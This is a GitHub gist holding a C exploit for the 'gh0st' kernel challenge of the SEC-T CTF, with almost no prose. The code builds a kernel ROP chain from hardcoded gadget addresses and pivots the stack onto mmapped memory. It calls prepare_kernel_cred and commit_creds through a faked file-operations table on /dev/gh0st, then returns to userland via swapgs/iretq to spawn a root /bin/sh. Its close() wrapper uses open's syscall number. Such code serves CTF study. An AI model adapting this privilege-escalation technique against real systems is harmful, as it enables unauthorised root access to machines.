Created
November 18, 2018 06:57
-
-
Save hama7230/792113dc466a5df1a2836b1a638f3b89 to your computer and use it in GitHub Desktop.
SEC-T CTF gh0st
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gcc -static -nostdlib -masm=intel ./exp.c -o exp | |
// syscall | |
int read(int fd, char* buf, int len) { | |
__asm__("mov rax, 0"); | |
__asm__("syscall"); | |
} | |
int write(int fd, char* buf, int len) { | |
__asm__("mov rax, 1"); | |
__asm__("syscall"); | |
} | |
int open(char* filename, int flags) { | |
__asm__("mov rax, 2"); | |
__asm__("syscall"); | |
} | |
int close(int fd) { | |
__asm__("mov rax, 2"); | |
__asm__("syscall"); | |
} | |
void exit(int status) { | |
__asm__("mov rax, 60"); | |
__asm__("syscall"); | |
} | |
int ioctl(unsigned int fd, unsigned int cmd, char* arg) { | |
__asm__("mov rax, 16"); | |
__asm__("syscall"); | |
} | |
int execve(char *filename, char *const argv[], char *const envp[]) { | |
__asm__("mov rax, 59"); | |
__asm__("syscall"); | |
} | |
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) { | |
__asm__("mov r10, rcx"); | |
__asm__("mov rax, 9"); | |
__asm__("syscall"); | |
} | |
// helper | |
int strlen(char* string) { | |
int len = 0; | |
for (; *(string++) != '\x00'; len++) {} | |
return len; | |
} | |
void puts(char* string) { | |
int len = strlen(string); | |
write(1, string, len); | |
} | |
void memset(char* a, char b, int len) { | |
int i; | |
for (i=0; i<len; i++) { | |
a[i] = b; | |
} | |
} | |
// for exploit | |
#define O_RDONLY 0 | |
#define O_RDWR 00000002 | |
#define PROT_READ 0x1 | |
#define PROT_WRITE 0x2 | |
#define MAP_POPULATE 0x8000 | |
// gadgets | |
unsigned long pop_rdi = 0xffffffff81000a78; // 0xffffffff81000a78: pop rdi ; ret ; (1290 found) | |
unsigned long mov_rdi_rax_call_rcx = 0xffffffff8103671d; // 0xffffffff8103671d: mov rdi, rax ; call rcx ; (2 found) | |
unsigned long pop_rcx = 0xffffffff8101d6dc; // 0xffffffff8101d6dc: pop rcx ; ret ; (19 found) | |
unsigned long xor_rax = 0xffffffff81076cc0; // 0xffffffff81076cc0: xor rax, rax ; ret ; (5 found) | |
unsigned long iretq = 0xffffffff812009d0; // fffffff812009d0: 48 cf iretq | |
unsigned long swapgs_popfq_ret = 0xffffffff81200bea; | |
unsigned long pivot_gadget = 0xffffffff810f3d0e; // 0xffffffff810f3d0e: mov esp, 0x8948FFF8 ; ret ; (1 found) | |
unsigned long commit_creds = 0xffffffff81038563; | |
unsigned long prepare_kernel_cred= 0xffffffff81038715; | |
unsigned long user_cs; | |
unsigned long user_ss; | |
unsigned long user_rflags; | |
static void save_state() { | |
__asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs)); | |
__asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss)); | |
__asm__("pushfq"); | |
__asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags)); | |
} | |
void shell(void) { | |
char *args[] = {"/bin/sh", 0}; | |
execve("/bin/sh", args, 0); | |
} | |
void _start(void) { | |
int i = 0; | |
char buf[0x1000]; | |
int fd; | |
int fds[0x100]; | |
unsigned long* fake_stack; | |
save_state(); | |
fake_stack = mmap(0x8948f000, 0x10000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0); | |
fake_stack += (0xff8/8); | |
*fake_stack++ = pop_rdi; | |
*fake_stack++ = 0; | |
*fake_stack++ = prepare_kernel_cred; | |
*fake_stack++ = pop_rcx; | |
*fake_stack++ = commit_creds; | |
*fake_stack++ = mov_rdi_rax_call_rcx; | |
*fake_stack++ = swapgs_popfq_ret; | |
*fake_stack++ = 0x246; | |
*fake_stack++ = iretq; | |
*fake_stack++ = &shell; | |
*fake_stack++ = user_cs; | |
*fake_stack++ = user_rflags; | |
*fake_stack++ = 0x8948f000 + 0x8000; | |
*fake_stack++ = user_ss; | |
fd = open("/dev/gh0st", O_RDWR); | |
if (fd < 0) { | |
puts("open error\n"); | |
exit(1); | |
} | |
for (int i=0; i<0x100; i++) { | |
fds[i] = open("/home/ctf/banner", O_RDONLY); | |
if (fds[i] < 0) { | |
puts("open error fds\n"); | |
exit(1); | |
} | |
} | |
// create | |
buf[0] = 'B'; buf[1] = 'F'; buf[2] = 'B'; buf[3] = 'F'; // header | |
buf[4] = 0x80; buf[5] = 0x0; buf[6] = 0; buf[7] = 0; // size | |
memset(buf + 8, '+', 0x1000 - 8); | |
ioctl(fd, 0x1337B4B3, buf); | |
*(unsigned long*)(buf+0x8) = (unsigned long)0xffffffffa0002380 + 0x108; | |
// fake ramfs_file_operations | |
for (int i=0; i<0x100/8; i++) { | |
*(unsigned long*)(buf+0x108 + i*8) = 0; | |
} | |
*(unsigned long*)(buf+0x108 + 2 * 8) = pivot_gadget; | |
memset(buf + 0x208, '-', 0x1000-0x208); // decrease stack ptr | |
for (int i=0; i<8; i++) { | |
buf[0x208+0xb0 + i*2 ] = ','; // write stack | |
buf[0x209+0xb0 + i*2] = '+'; // increase stack ptr | |
} | |
write(fd, buf, 0x1000); | |
ioctl(fd, 0xAC1DC0DE, buf); | |
for (int i=0; i<0x100; i++) { | |
read(fds[i], buf, 0x1000); | |
} | |
while (1) {} | |
exit(0); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment